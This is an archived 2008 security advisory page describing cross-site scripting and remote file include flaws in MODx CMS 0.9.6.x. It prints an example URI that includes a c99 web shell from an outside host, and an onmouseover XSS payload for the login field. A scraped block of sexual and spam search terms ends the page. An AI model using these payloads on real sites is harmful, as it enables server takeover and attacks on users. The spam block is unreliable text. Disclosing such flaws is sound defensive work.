about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MODx CMS Cross Site Scripting and Remote File Include Vulnerabilities


Title MODx CMS Cross Site Scripting and Remote File Include Vulnerabilities
Published 2008-11-23-12:00AM
Updated 2008-11-24-10:53PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  RoMaNcYxHaCkEr
Vulnerable  MODx MODx 0.9.6 2
MODx MODx 0.9.6 .1p1
MODx MODx 0.9.6 .1
MODx MODx 0.9.6
Not Vulnerable  
Code  An attacker can exploit these issues via a browser. To exploit the cross-site scripting issue, the attacker must entice an unsuspecting victim into following a malicious URI.The following example URIs are available:Remote File-Include:
http://www.example.com/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.shellbox.com.ar/%5Bc%5D/c99.txt?Cross-Site Scripting:
The attacker creates a malicious POST request that sets the username box to the following value: "+onmouseover=alert(400942638703)+".
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 00:43:28 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sexe18 nude pakis www.ilovef Sax imag comeSEX news for C PhpNuke+ex www.yinhan lite Www.tube8. www.hao968 a...2F2422 university dy.95kk.co maxcpm.inf php-nuke 2 news+for+c www sex co WWW.Sexsex IBP news for c Wbb Lite 1 Blow Blow news for c WWW.Tamils WWW.Sexsex Xxsex www.lwc200 sab sriya sex X sex phot maxcpm.inf call girls Ayub AOL SuperB mngbw.com www.taoke1 shemal news+for+C WWW.Slaz jdk 1.4.2. wangyou.pc ...4.1.0 www.2d30.c Searching www.itaogo www.teenle indian gir Searching